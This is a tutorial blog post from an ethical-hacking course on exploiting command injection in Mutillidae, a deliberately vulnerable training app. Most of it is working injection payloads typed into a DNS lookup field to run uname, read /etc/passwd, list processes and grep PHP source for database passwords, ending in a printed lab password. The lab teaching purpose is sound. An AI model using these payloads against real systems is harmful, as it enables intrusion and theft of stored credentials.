Mutillidae Part 2: Command Injection Database Interrogation

MODULE 15:- Website Hacking

  1. How To Create a Virtual Lab For Web Penetration Testing
  2. How to use httrack website copier command line
  3. How to use httrack website copier graphically
  4. Free Website Vulnerability Scanner – W3af in Kali Linux
  5. How to use Arachni scanner for Web Application vulnerability in Kali Linux
  6. Inject SQL Injection Script by using Firebug | SQLi Part1
  7. Mutillidae Part 2: Command Injection Database Interrogation

Mutillidae Part 2: Command Injection Database Interrogation 


What is Mutillidae?

Mutillidae is  a free, open source, Vulnerable Web-application provide a target for Web-Security analyst. It have OWASP-Top10 Vulnerability, and designed by OWASP.
What is command Injection?
Command Injection
is a web-vulnerability that allow attacker to run Operating System commands or Server side scripts from the web interface (Web application). Such type of vulnerability occurs when web application allow users to access any command for example nslookup, whois, ping, traceroute etc through webpage. This vulnerability can tested by fuzzing technique. In fuzzing attacker commonly used a word like “;” or “|” or “||” or “&” or “&&” end of expected input.
For example [expected_Input]; [command]

Pre-Requisite Web Penetration Testing Lab

1. Configured Mutillidae.
How To Setup Virtual Lab For Web Penetration Testing

Remote database access has been turned on.

2. Installed Kali Linux:

In Simple way Kali Linux is not necessary, but if you are penetration Tester you should use Kali Linux Virtual Machine.

Configure the network interface of both machine Fedora-Mutillidae and Kali Linux. Start both machine and check the connectivity between them.
How to install Kali Linux

Step 1: Access Mutillidae by Kali Linux Machine

On the Kali Linux Machine, Open IceWeasel
open browser in kali linux

Application à Internet à IceWeasel Web Browser
In the URL address bar http://Victim_Ip_Address/mutillidae (Victim IP can be obtained by #ifconfig command)
In mine case http://192.168.0.102/mutillidae

access mutillidae

Go to DNS Lookup
OWASP Top 10 à A2 – Cross Site Scripting (XSS) à Reflected (First Order) à DNS Lookup
OPEN DNS LOOKUP in Mutillidae
DNS Lookup is designed to do just that by a dnslookup utility in command interface
Hostname /IP: www.cyberpratibha.com/blog
Click on the Lookup DNS button and see your Results.

dnslookup for cyberpedia
Test DNS Lookup Vulnerability
To find the command execution vulnerability, just enter the hostname and then command separated by “;”. The procedure “;” after what the software expects, is called fuzzing. Enter following code
www.cyberpratibha.com/blog; uname –a
View you Results
command injecttion uname -a

Perform Reconnaissance:

It would be wonder if you get that particular web application is running from. In Linux you would be able to find current working directory by “pwd”. Follow the given instructions:

Enter: Hostname / IP: www.cyberpratibha.com/blog; pwd
Click on the Lookup DNS Button, and view you Results.
pwd command through dnslookup

Interrogate the dns-lookup.php application

The codes are filled by attacker is excuted by dns-lookup.php. Let’s see if we are able to find the line code where PHP is exciting a system call. Follow instructions

hostname; find /var/www/html/mutillidae -name “dns-lookup.php” | xargs egrep ‘(exec|system|virtual)’
C
lick on Lookup DNS button, Analyze you Results

“nslookup” Linux command is executing by a function called shell_exec(),

interrogate

Database reconnaissance:
Enter the following syntax

  • hostname; cat /etc/passwd | egrep -i ‘(postgres|sql|db2|ora)’

Click on the Lookup DNS button, View your Results. In the Result MySQL is the database engine.
database reconaisansce

Discover Database:

  • By using “ps” command you can discover the Database Engine. It is used to search for the process strings such as pstgresql, sql, db2 and ora.
    hostname; ps -eaf | egrep -i ‘(postgres|sql|db2|ora)’

Click on the Lookup DNS button to see the mysqld is running or not in the Result.
discover database

Database Interrogation:

In this step we will figure out if any php scripts contain a database name and password under /var/www/html/mutillidae. Fill the given syntax into the text box and click on the Lookup DNS button

hostname; find /var/www/html/mutillidae -name “*.php”

This command will display list of all php scritps into the /var/www/html/mutillidae folder. There is more then 900 scripts.
database iterrogation

Find the password in php scripts:

We will search all php scripts for the string “password” and ”=” command will be similar following
hostname; find /var/www/html/mutillidae -name “*.php” | xargs grep -i “password” | grep “=”
find the scripts contains password

Obtain Password from the Results:

See the string password, it is in actual

$mMySQLDatabasePassword = “toor”;

Search for user OR Login in the MySQLHandler.php

As We know the Database passwords are inside the MySQLHandler.php. following code is used for obtain the user or Login
hostname; find /var/www/html/mutillidae -name “MySQLHandler.php” | xargs egrep -i ‘(user|login)’ | grep “=”

 

Display MySQLHandler.php
I figure I could have demonstrated to you this to start with, however great things go to those that hold up.

It is possible to show the substance of the MySQLHandler.php program, by encoding the “<?php” and “?>” labels. These tags advise apache to execute a php script. To get around this issue and simply show the content of the project, we change “<” to “&#60;” and “>” to “&#62;”.

hostname; find /var/www/html/mutillidae -name “MySQLHandler.php” | xargs cat | sed ‘s/</\&#60;/g’ | sed ‘s/>/\&#62;/g’

Click on the Lookup DNS Button, and view the result.
display MySQLHandler

Vijay Kumar

Ethical Hacking & Penetration Testing Trainer, For more detail view My Profile

Latest posts by Vijay Kumar (see all)

Leave a Reply

Your email address will not be published. Required fields are marked *